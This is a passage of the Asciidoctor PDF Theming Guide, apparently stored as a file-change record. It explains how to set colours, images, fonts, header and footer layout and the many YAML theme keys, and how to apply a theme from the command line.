preserve the original color values in the final PDF.\n\nHere's how to specify the color red in CMYK:\n\n* [0, 0.99, 1, 0]\n* [0, 99%, 100%, 0]\n\nHere's how a CMYK color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [0, 0.99, 1, 0]\n----\n\n=== Images\n\nAn image is specified either as a bare image path or as an inline image macro as found in the AsciiDoc syntax.\nImages are currently resolved relative to the value of the `pdf-stylesdir` attribute.\n\nThe following image types (and corresponding file extensions) are supported:\n\n* PNG (.png)\n* JPEG (.jpg)\n* SVG (.svg)\n\nCAUTION: The GIF format (.gif) is not supported.\n\nHere's how an image is specified in the theme file as a bare image path:\n\n[source,yaml]\n----\ntitle_page:\n background_image: title-cover.png\n----\n\nHere's how the image is specified using the inline image macro:\n\n[source,yaml]\n----\ntitle_page:\n background_image: image:title-cover.png[]\n----\n\nAs in the AsciiDoc syntax, the inline image macro allows you to set the width and alignment of the image:\n\n[source,yaml]\n----\ntitle_page:\n logo_image: image:logo.png[width=250,align=center]\n----\n\n== Fonts\n\nYou can select from <<built-in-fonts,built-in PDF fonts>>, <<bundled-fonts,fonts bundled with Asciidoctor PDF>> or <<custom-fonts,custom fonts>> loaded from TrueType font (TTF) files.\nIf you want to use custom fonts, you must first declare them in your theme file.\n\n=== Built-in fonts\n\nThe names of the built-in fonts (for general-purpose text) are as follows:\n\n[%header%autowidth]\n|===\n|Font Name |Font Family\n\n|Helvetica\n|sans-serif\n\n|Times-Roman\n|serif\n\n|Courier\n|monospace\n|===\n\nUsing a built-in font requires no additional files.\nYou can use the key anywhere a `font_family` property is accepted in the theme file.\nFor example:\n\n[source,yaml]\n----\nbase:\n font_family: Times-Roman\n----\n\nHowever, when you use a built-in font, the characters that you use in your document are limited to the WINANSI (http:\/\/en.wikipedia.org\/wiki\/Windows-1252[Windows-1252]) code set.\nWINANSI includes most of the characters needed for writing in Western languages (English, French, Spanish, etc).\nFor anything outside of that, PDF is BYOF (Bring Your Own Font).\n\nEven though the built-in fonts require the content to be encoded in WINANSI, _you still type your AsciiDoc document in UTF-8_.\nAsciidoctor PDF encodes the content into WINANSI when building the PDF.\nAny characters in your AsciiDoc document that cannot be encoded will be replaced with an underscore (`_`).\n\n=== Bundled fonts\n\nAsciidoctor PDF bundles several fonts that are used in the default theme.\nYou can also use these fonts in your custom theme.\nThese fonts provide more characters than the built-in PDF fonts, but still only a subset of UTF-8.\n\nThe family names of the fonts bundled with Asciidoctor PDF are as follows:\n\nhttp:\/\/www.google.com\/get\/noto\/#\/family\/noto-serif[NotoSerif]::\nA serif font that can be styled as normal, italic, bold or bold_italic.\n\nhttp:\/\/mplus-fonts.osdn.jp\/mplus-outline-fonts\/design\/index-en.html#mplus_1mn[Mplus1mn]::\nA monospaced font that maps different thicknesses to the styles normal, italic, bold and bold_italic.\nAlso provides the circled numbers used in callouts.\n\nhttp:\/\/mplus-fonts.osdn.jp\/mplus-outline-fonts\/design\/index-en.html#mplus_1p[Mplus1pMultilingual]::\nA sans-serif font that provides a very complete set of Unicode glyphs.\nCannot be styled as italic, bold or bold_italic.\nUseful as a fallback font.\n
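\nTo use one of these fonts, reference its family name anywhere a `font_family` property is accepted in the theme file.\nHere's a sketch that selects bundled fonts for body text and inline code:\n\n[source,yaml]\n----\nbase:\n font_family: NotoSerif\nliteral:\n font_family: Mplus1mn\n----\n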
\nCAUTION: At the time of this writing, you cannot use the bundled fonts if you define your own custom fonts.\nThis limitation may be lifted in the future.\n\n=== Custom fonts\n\nThe limited character set of WINANSI, or the bland look of the built-in fonts, may motivate you to load your own font.\nCustom fonts can enhance the look of your PDF theme substantially.\n\nTo start, you need to find a collection of TTF files of the font you want to use.\nA collection typically consists of all four styles of a font:\n\n* normal\n* italic\n* bold\n* bold_italic\n\nYou'll need all four styles to support AsciiDoc content properly.\n_Asciidoctor PDF cannot italicize a font that is not italic like a browser can._\n\nOnce you've obtained the TTF files, put them into a directory in your project where you want to store the fonts.\nIt's recommended that you name them consistently so it's easier to type the names in the theme file.\n\nLet's assume the name of the font is https:\/\/github.com\/google\/roboto\/tree\/master\/out\/RobotoTTF[Roboto].\nName the files as follows:\n\n* roboto-normal.ttf (_originally Roboto-Regular.ttf_)\n* roboto-italic.ttf (_originally Roboto-Italic.ttf_)\n* roboto-bold.ttf (_originally Roboto-Bold.ttf_)\n* roboto-bold_italic.ttf (_originally Roboto-BoldItalic.ttf_)\n\nNext, declare the font under the `font_catalog` key at the top of your theme file, giving it a unique key (e.g., `Roboto`).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n----\n\nYou can use the key you gave to the font in the font catalog anywhere a `font_family` property is accepted in the theme file.\nFor instance, to use the Roboto font for all headings, you'd use:\n\n[source,yaml]\n----\nheading:\n font_family: Roboto\n----\n\nWhen you execute Asciidoctor PDF, you need to specify the directory where the fonts reside using the `pdf-fontsdir` attribute:\n\n $ asciidoctor-pdf -a pdf-style=basic-theme.yml -a pdf-fontsdir=path\/to\/fonts document.adoc\n\nWARNING: Currently, all fonts referenced by the theme need to be present in the directory specified by the `pdf-fontsdir` attribute.\n\nYou can add any number of fonts to the catalog.\nEach font must be assigned a unique key, as shown here:\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n RobotoLight:\n normal: roboto-light-normal.ttf\n italic: roboto-light-italic.ttf\n bold: roboto-light-bold.ttf\n bold_italic: roboto-light-bold_italic.ttf\n----\n\n=== Fallback fonts\n\nIf one of your fonts is missing a character that is used in a document, such as special symbols, you can tell Asciidoctor PDF to retrieve the character from a fallback font.\nYou only need to specify one fallback font...typically one that has a full set of symbols.\n\nLike with other custom fonts, you first need to declare the fallback font.\nLet's choose https:\/\/android.googlesource.com\/platform\/frameworks\/base\/+\/master\/data\/fonts\/[Droid Sans Fallback].\nYou can map all the styles to a single font file (since bold and italic don't usually make sense for symbols).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: 
droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n----\n\nNext, assign the key to the `fallbacks` key under the `font_catalog` key.\nBe sure to surround the key name in square brackets as shown below.\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n fallbacks: [DroidSansFallback]\n----\n\nTIP: If you are using more than one fallback font, separate each key name by a comma.\n\nThat's it!\nNow you're covered.\nYou don't need to reference the fallback font anywhere else in your theme file to use it.\n\nCAUTION: Using a fallback font does slow down PDF generation slightly.\nIt's best to select fonts that have all the characters you need.\n\n== Keys\n\nTBW\n\n=== Page\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|page_background_color\n|<<colors,color>>\n|background_color: ffffff\n\n|page_layout\n|portrait, landscape\n|layout: portrait\n\n|page_margin\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|margin: [0.5in, 0.67in, 0.67in, 0.67in]\n\n|page_size\n|named size, <<measurement-units,measurement array [width, height]>>\n|size: Letter\n|===\n\n=== Base\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|base_font_color\n|<<colors,color>>\n|font_color: #333333\n\n|base_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|base_font_size\n|<<values,number>>\n|font_size: 10.5\n\n|base_line_height_length\n|<<values,number>>\n|line_height_length: 12\n\n|base_line_height\n|<<values,number>>\n|line_height: 1.14\n\n|base_font_size_large\n|<<values,number>>\n|font_size_large: 13\n\n|base_font_size_small\n|<<values,number>>\n|font_size_small: 9\n\n|base_font_style\n|normal, italic, bold, bold_italic\n|font_style: normal\n\n|base_align\n|left, center, right, justify\n|align: justify\n\n|base_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|base_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|base_border_color\n|<<colors,color>>\n|border_color: eee\n|===\n\n=== Vertical and horizontal rhythm\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|vertical_rhythm\n|<<values,number>>\n|vertical_rhythm: 12\n\n|horizontal_rhythm\n|<<values,number>>\n|horizontal_rhythm: 12\n|===\n\n=== Link\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|link_font_color\n|<<colors,color>>\n|font_color: 428BCA\n\n|link_font_family\n|<<fonts,font family name>>\n|font_family: Roboto\n\n|link_font_size\n|<<values,number>>\n|font_size: 9\n\n|link_font_style\n|normal, italic, bold, bold_italic\n|font_style: normal\n|===\n\n=== Literal inline\n\nThe literal key is used for inline monospaced text in prose and table cells.\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|literal_font_color\n|<<colors,color>>\n|font_color: B12146\n\n|literal_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|literal_font_size\n|<<values,number>>\n|font_size: 12\n\n|literal_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n|===\n\n=== Heading\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|heading_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|heading_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|heading_font_size\n|<<values,number>>\n|font_size: 
9\n\n|heading_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|heading_h<n>_font_color^[1]^\n|<<colors,color>>\n|h2_font_color: [0, 99%, 100%, 0]\n\n|heading_h<n>_font_family^[1]^\n|<<fonts,font family name>>\n|h4_font_family: Roboto\n\n|heading_h<n>_font_size^[1]^\n|<<values,number>>\n|h6_font_size: round($base_font_size * 1.7)\n\n|heading_h<n>_font_style^[1]^\n|normal, italic, bold, bold_italic\n|h3_font_style: bold_italic\n\n|heading_line_height\n|<<values,number>>\n|line_height: 1.2\n\n|heading_margin_top\n|<<measurement-units,measurement>>\n|margin_top: $vertical_rhythm * 0.2\n\n|heading_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 9.600\n|===\n\n^[1]^ `<n>` may be a number ranging from 1 to 6, representing each of the six heading levels.\n\n=== Title page\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|title_page_align\n|left, center, right, justify\n|align: right\n\n|title_page_title_top\n|percentage\n|title_top: 55%\n\n|title_page_title_font_size\n|<<values,number>>\n|title_font_size: 27\n\n|title_page_title_font_color\n|<<colors,color>>\n|title_font_color: 999999\n\n|title_page_title_line_height\n|<<values,number>>\n|title_line_height: 0.9\n\n|title_page_subtitle_font_size\n|<<values,number>>\n|subtitle_font_size: 18\n\n|title_page_subtitle_font_style\n|normal, italic, bold, bold_italic\n|subtitle_font_style: bold_italic\n\n|title_page_subtitle_line_height\n|<<values,number>>\n|subtitle_line_height: 1\n\n|title_page_authors_margin_top\n|<<measurement-units,measurement>>\n|authors_margin_top: 13.125\n\n|title_page_authors_font_size\n|<<values,number>>\n|authors_font_size: $base_font_size_large\n\n|title_page_authors_font_color\n|<<colors,color>>\n|authors_font_color: 181818\n\n|title_page_revision_margin_top\n|<<measurement-units,measurement>>\n|revision_margin_top: 13.125\n|===\n\n=== Block\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|block_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [12, 15, 12, 15]\n\n|block_margin_top\n|<<measurement-units,measurement>>\n|margin_top: 0\n\n|block_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 1\n|===\n\nBlock styles are applied to the following block types:\n\n[cols=\"1a,1a,1a\", grid=none, frame=none]\n|===\n|\n* admonition\n* example\n* quote\n|\n* verse\n* sidebar\n* image\n|\n* listing\n* literal\n* table\n|===\n\n=== Caption\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|caption_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|caption_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|caption_font_size\n|<<values,number>>\n|font_size: 11\n\n|caption_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|caption_align\n|left, center, right, justify\n|align: left\n\n|caption_margin_inside\n|<<measurement-units,measurement>>\n|margin_inside: 3\n\n|caption_margin_outside\n|<<measurement-units,measurement>>\n|margin_outside: 0\n|===\n\n=== Code\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|code_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|code_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|code_font_size\n|<<values,number>>\n|font_size: 11\n\n|code_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|code_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: 11\n\n|code_line_height\n|<<values,number>>\n|line_height: 
1.25\n\n|code_background_color\n|<<colors,color>>\n|background_color: F5F5F5\n\n|code_border_color\n|<<colors,color>>\n|border_color: CCCCCC\n\n|code_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|code_border_width\n|<<values,number>>\n|border_width: 0.75\n|===\n\n=== Blockquote\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|blockquote_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|blockquote_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|blockquote_font_size\n|<<values,number>>\n|font_size: 13\n\n|blockquote_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|blockquote_border_width\n|<<values,number>>\n|border_width: 5\n\n|blockquote_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|blockquote_cite_font_size\n|<<values,number>>\n|cite_font_size: 9\n\n|blockquote_cite_font_color\n|<<colors,color>>\n|cite_font_color: 999999\n\n|blockquote_cite_font_family\n|<<fonts,font family name>>\n|cite_font_family: NotoSerif\n\n|blockquote_cite_font_style\n|normal, italic, bold, bold_italic\n|cite_font_style: bold\n|===\n\n=== Sidebar\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|sidebar_border_color\n|<<colors,color>>\n|border_color: FFFFFF\n\n|sidebar_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|sidebar_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|sidebar_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|sidebar_title_font_color\n|<<colors,color>>\n|title_font_color: 333333\n\n|sidebar_title_font_family\n|<<fonts,font family name>>\n|title_font_family: NotoSerif\n\n|sidebar_title_font_size\n|<<values,number>>\n|title_font_size: 13\n\n|sidebar_title_font_style\n|normal, italic, bold, bold_italic\n|title_font_style: bold\n\n|sidebar_title_align\n|left, center, right, justify\n|title_align: center\n|===\n\n=== Example\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|example_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|example_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|example_border_width\n|<<values,number>>\n|border_width: 0.75\n\n|example_background_color\n|<<colors,color>>\n|background_color: transparent\n|===\n\n=== Admonition\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|admonition_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|admonition_border_width\n|<<values,number>>\n|border_width: 0.5\n|===\n\n=== Image\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|image_align_default\n|left, center, right, justify\n|align_default: left\n|===\n\n=== Lead\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|lead_font_size\n|<<values,number>>\n|font_size: 13\n\n|lead_line_height\n|<<values,number>>\n|line_height: 1.4\n|===\n\n=== Abstract\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|abstract_font_color\n|<<colors,color>>\n|font_color: 5C6266\n\n|abstract_font_size\n|<<values,number>>\n|font_size: 13\n\n|abstract_line_height\n|<<values,number>>\n|line_height: 1.4\n\n|abstract_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n|===\n\n=== Thematic break\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|thematic_break_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|thematic_break_margin_top\n|<<measurement-units,measurement>>\n|margin_top: 6\n\n|thematic_break_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 18\n|===\n\n=== Description list\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|description_list_term_font_style\n|normal, italic, bold, bold_italic\n|term_font_style: italic\n\n|description_list_description_indent\n|<<values,number>>\n|description_indent: 15\n|===\n\n=== Outline list\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|outline_list_indent\n|<<measurement-units,measurement>>\n|list_indent: 40\n\n|outline_list_item_spacing\n|<<measurement-units,measurement>>\n|item_spacing: 4\n|===\n\n=== Table\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|table_background_color\n|<<colors,color>>\n|background_color: FFFFFF\n\n|table_even_row_background_color\n|<<colors,color>>\n|even_row_background_color: F9F9F9\n\n|table_foot_background_color\n|<<colors,color>>\n|foot_background_color: F0F0F0\n\n|table_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|table_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|table_cell_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|cell_padding: [3, 3, 6, 3]\n|===\n\n[[key-toc]]\n=== Table of contents\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|toc_dot_leader_content\n|double-quoted string\n|dot_leader_content: \". \"\n\n|toc_dot_leader_color\n|<<colors,color>>\n|dot_leader_color: 999999\n\n|toc_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|toc_h<n>_font_color\n|<<colors,color>>\n|h3_font_color: 999999\n\n|toc_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|toc_font_size\n|<<values,number>>\n|font_size: 9\n\n|toc_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|toc_line_height\n|<<values,number>>\n|line_height: 1.5\n\n|toc_indent\n|<<measurement-units,measurement>>\n|indent: 20\n\n|toc_margin_top\n|<<measurement-units,measurement>>\n|margin_top: 20\n|===\n\n=== Running header & footer\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|header_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|header_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|header_border_width\n|<<measurement-units,measurement>>\n|border_width: 0.25\n\n|header_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|header_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|header_font_size\n|<<values,number>>\n|font_size: 9\n\n|header_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|header_height\n|<<measurement-units,measurement>>\n|height: 0.75in\n\n|header_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [0, 3, 0, 3]\n\n|header_image_valign\n|top, center, bottom, <<measurement-units,measurement>>\n|image_valign: 4\n\n|header_valign\n|top, center, bottom\n|valign: center\n\n|header_<side>_content_<align>^[1]^\n|quoted string\n|right: '\\{page-number}'\n\n|footer_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|footer_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|footer_border_width\n|<<measurement-units,measurement>>\n|border_width: 0.25\n\n|footer_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|footer_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|footer_font_size\n|<<values,number>>\n|font_size: 9\n\n|footer_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|footer_height\n|<<measurement-units,measurement>>\n|height: 0.75in\n\n|footer_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [0, 3, 0, 3]\n\n|footer_image_valign\n|top, center, bottom, <<measurement-units,measurement>>\n|image_valign: 4\n\n|footer_valign\n|top, center, bottom\n|valign: top\n\n|footer_<side>_content_<align>^[1]^\n|quoted string\n|center: '\\{page-number}'\n|===\n\n^[1]^ `<side>` can be `recto` (odd pages) or `verso` (even pages).\n`<align>` can be `left`, `center` or `right`.\n\nIMPORTANT: You must define a height for the running header or footer; otherwise, it will not be shown.\n\nNOTE: The background color spans the width of the page.\nWhen a background color is specified, the border also spans the width of the page.\n\n==== Implicit attributes\n\nIn addition to the document-level attributes defined in the AsciiDoc document, the following attributes are available when defining the content keys in the footer:\n\n* page-count\n* page-number\n* document-title\n* document-subtitle\n* chapter-title\n* section-title\n* section-or-chapter-title\n\nHere's an example that shows how these attributes can be used in the running footer:\n\n[source,yaml]\n----\nfooter:\n height: 0.75in\n recto_content:\n right: '{section-or-chapter-title} | {page-number}'\n verso_content:\n left: '{page-number} | {chapter-title}'\n----\n\n==== Images\n\nYou can add an image to the running header or footer using the AsciiDoc inline image syntax.\nNote that the image must be the whole value for a given position (left, center or right).\nIt cannot be combined with text.\n\nHere's an example of how to use an image in the running header (which also applies to the footer).\n\n[source,yaml]\n----\nheader:\n height: 0.75in\n image_valign: 2 # <1>\n recto_content:\n center: image:footer-logo.png[width=80]\n verso_content:\n center: $header_recto_content_center\n----\n<1> You can use the `image_valign` key to slightly nudge the image up or down.\n\nCAUTION: The image must fit in the allotted space for the running header or footer.\nOtherwise, you will run into layout issues.\nAdjust the width attribute accordingly.\n\n== Applying your theme\n\nAfter creating a theme, you'll need to tell Asciidoctor PDF where to find it.\nThis is done using AsciiDoc attributes.\n\nThere are three AsciiDoc attributes that tell Asciidoctor PDF how to locate and apply your theme.\n\npdf-stylesdir:: The directory where the theme file is located.\n_Specifying an absolute path is recommended._\n+\nIf you use images in your theme, image paths are resolved relative to this directory.\n\npdf-style:: The name of the YAML theme file to load.\nIf the name ends with `.yml`, it's assumed to be the complete name of a file.\nOtherwise, `-theme.yml` is appended to the name to make the file name (i.e., `<name>-theme.yml`).\n\npdf-fontsdir:: The directory where the fonts used by your theme, if any, are located.\n_Specifying an absolute path is recommended._\n\nLet's assume that you've put your theme files inside a directory named `resources` with the following layout:\n\n....\ndocument.adoc\nresources\/\n themes\/\n basic-theme.yml\n fonts\/\n roboto-normal.ttf\n roboto-italic.ttf\n roboto-bold.ttf\n roboto-bold_italic.ttf\n....\n\nHere's how you'd load your theme when calling Asciidoctor PDF:\n\n $ asciidoctor-pdf -a pdf-stylesdir=resources\/themes -a pdf-style=basic -a pdf-fontsdir=resources\/fonts\n\nIf all goes well, Asciidoctor PDF should run without an error or warning.\n\nNOTE: You only need to specify the `pdf-fontsdir` if you are using custom fonts in your theme.\n\nYou can skip setting the `pdf-stylesdir` attribute and just pass the absolute path of your theme file to the `pdf-style` attribute.\n\n $ asciidoctor-pdf -a pdf-style=resources\/themes\/basic-theme.yml -a pdf-fontsdir=resources\/fonts\n\nHowever, in this case, image paths in your theme won't be resolved properly.\n\nPaths are resolved relative to the current directory.\nHowever, in the future, this may change so that paths are resolved relative to the base directory (typically the document's directory).\nTherefore, it's recommended that you specify absolute paths for now to future-proof your configuration.\n\n $ asciidoctor-pdf -a pdf-stylesdir=\/path\/to\/resources\/themes -a pdf-style=basic -a pdf-fontsdir=\/path\/to\/resources\/fonts\n","old_contents":"= Asciidoctor PDF Theming Guide\nDan Allen <https:\/\/github.com\/mojavelinux>\n:toc: macro\n:icons: font\n:idprefix:\n:idseparator: -\n:window: _blank\n\n\/\/\/\/\nTopics remaining to document:\n* line height and line height length (and what that all means)\n* title page layout \/ title page images (logo & background)\n* document that unicode escape sequences can be used inside double-quoted strings\n\/\/\/\/\n\nThe theming system in Asciidoctor PDF is used to control the layout and styling of the PDF file that Asciidoctor PDF generates from AsciiDoc.\nThe theme is driven by a YAML-based configuration file.\nThis document explains how the theming system works, how to define a custom theme and how to enable the theme when running Asciidoctor PDF.\n\ntoc::[]\n\n== Language overview\n\nThe theme language in Asciidoctor PDF is based on the http:\/\/en.wikipedia.org\/wiki\/YAML[YAML] data format and incorporates many concepts from CSS and SASS.\nTherefore, if you have a background in web design, the theme language should be immediately familiar to you.\n\nLike CSS, themes have both selectors and properties.\nSelectors are the components you want to style.\nThe properties are the style elements of those components that can be styled.\nAll selector names are implicit (e.g., `heading`), so you customize the theme primarily by manipulating pre-defined property values (e.g., `font_size`).\n\n[NOTE]\n====\nThe theme language in Asciidoctor PDF supports a limited subset of the properties from CSS.\nSome of these properties have different names from those found in CSS.\n\nInstead of separate properties for font weight and font style, the theme language combines these as the `font_style` property (allowing values \"normal\", \"bold\", \"italic\" and \"bold_italic\").\n\nThe `text_align` property from CSS is the `align` property in the theme language.\n\nThe `color` property from CSS is the `font_color` property in the theme language.\n====\n\nA theme (or style) is described in a YAML-based data format and stored in a dedicated theme file.\nYAML is a human-friendly data format that resembles CSS and helps to describe the theme.\nThe theme language adds some extra features to YAML, such as variables, basic math, measurements and color values.\nThese enhancements will be explained in detail in later sections.\n\nThe theme file must be named _<name>-theme.yml_, where `<name>` is the name of the theme.\n\nHere's an example of a basic theme file:\n\n.basic-theme.yml\n[source,yaml]\n----\npage:\n layout: portrait\n margin: [0.75in, 1in, 0.75in, 1in]\n size: Letter\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n line_height_length: 17\n line_height: $base_line_height_length \/ $base_font_size\nvertical_rhythm: $base_line_height_length\nheading:\n font_color: #262626\n font_size: 17\n font_style: bold\n line_height: 1.2\n margin_bottom: $vertical_rhythm\nlink:\n font_color: #002FA7\noutline_list:\n indent: $base_font_size * 1.5\n----\n\nWhen creating a new theme, you only have to define the keys you want to override from the base theme (PENDING, see https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/issues\/132[#132]).\nThe converter uses the information from the theme map to help construct the PDF.\nAll the available keys are documented in <<keys>>.\n\nKeys may be nested to an arbitrary depth to eliminate redundant prefixes (an approach inspired by SASS).\nOnce the theme is loaded, all keys are flattened into a single map of qualified keys.\nNesting is simply a shorthand way of organizing the keys.\nIn the end, a theme is just a map of key\/value pairs.\n\nNested keys are adjoined to their parent key with an underscore (`_`).\nThis means the selector part (e.g., `link`) is combined with the property name (e.g., `font_color`) into a single, qualified key (e.g., `link_font_color`).\n\nFor example, let's assume we want to set the base (i.e., global) font size and color.\nThese keys may be written longhand:\n\n[source,yaml]\n----\nbase_font_color: #333333\nbase_font_family: Times-Roman\nbase_font_size: 12\n----\n\nOr, to avoid having to type the prefix `base_` multiple times, the keys may be written hierarchically:\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n----\n\nOr even:\n\n[source,yaml]\n----\nbase:\n font:\n color: #333333\n family: Times-Roman\n size: 12\n----\n\nEach level of nesting must be indented by twice the amount of indentation of the parent level.\nAlso note the placement of the colon after each key name.\n\n== Values\n\nThe value of a key may be one of the following types:\n\n* String\n - Font family name (e.g., Roboto)\n - Font style (normal, bold, italic, bold_italic)\n - Alignment (left, center, right, justify)\n - Color as hex string (e.g., #ffffff)\n - Image path\n* Number (integer or float) with optional units (default unit is points)\n* Array\n - Color as RGB array (e.g., [51, 51, 51])\n - Color as CMYK array (e.g., [50, 100, 0, 0])\n - Margin (e.g., [1in, 1in, 1in, 1in])\n - Padding (e.g., [1in, 1in, 1in, 1in])\n* Variable reference (e.g., $base_font_color)\n* Math expression\n\nNote that keys almost always require a value of a specific type, as documented in <<keys>>.\n\n=== Inheritance\n\nLike CSS, inheritance is a key feature in the Asciidoctor PDF theme language.\nFor many of the properties, if a key is not specified, the key inherits the value applied to the parent content in the content hierarchy.\nThis behavior saves you from having to specify properties unless you want to override the inherited value.\n\nThe following keys are inherited:\n\n* font_family\n* font_color\n* font_size\n* font_style\n* line_height (currently some exceptions)\n* text_transform (only for headings)\n* margin_bottom (falls back to $vertical_rhythm)\n\n.Heading Inheritance\n****\nHeadings are special in that they inherit starting from a specific heading level (e.g., `heading_font_size_h2`) to the heading category (e.g., `heading_font_size`) and then directly to the base value (e.g., `base_font_size`), skipping any enclosing context.\n****\n\n
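Here's a minimal sketch of how this fallback works (the key names come from this guide; the values are illustrative):\n\n[source,yaml]\n----\nbase:\n font_color: #333333\nheading:\n font_style: bold\n # heading_font_color is not set, so headings fall back to\n # $base_font_color; an h2_font_color key would override it\n # for level-2 headings only\n----\n\n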
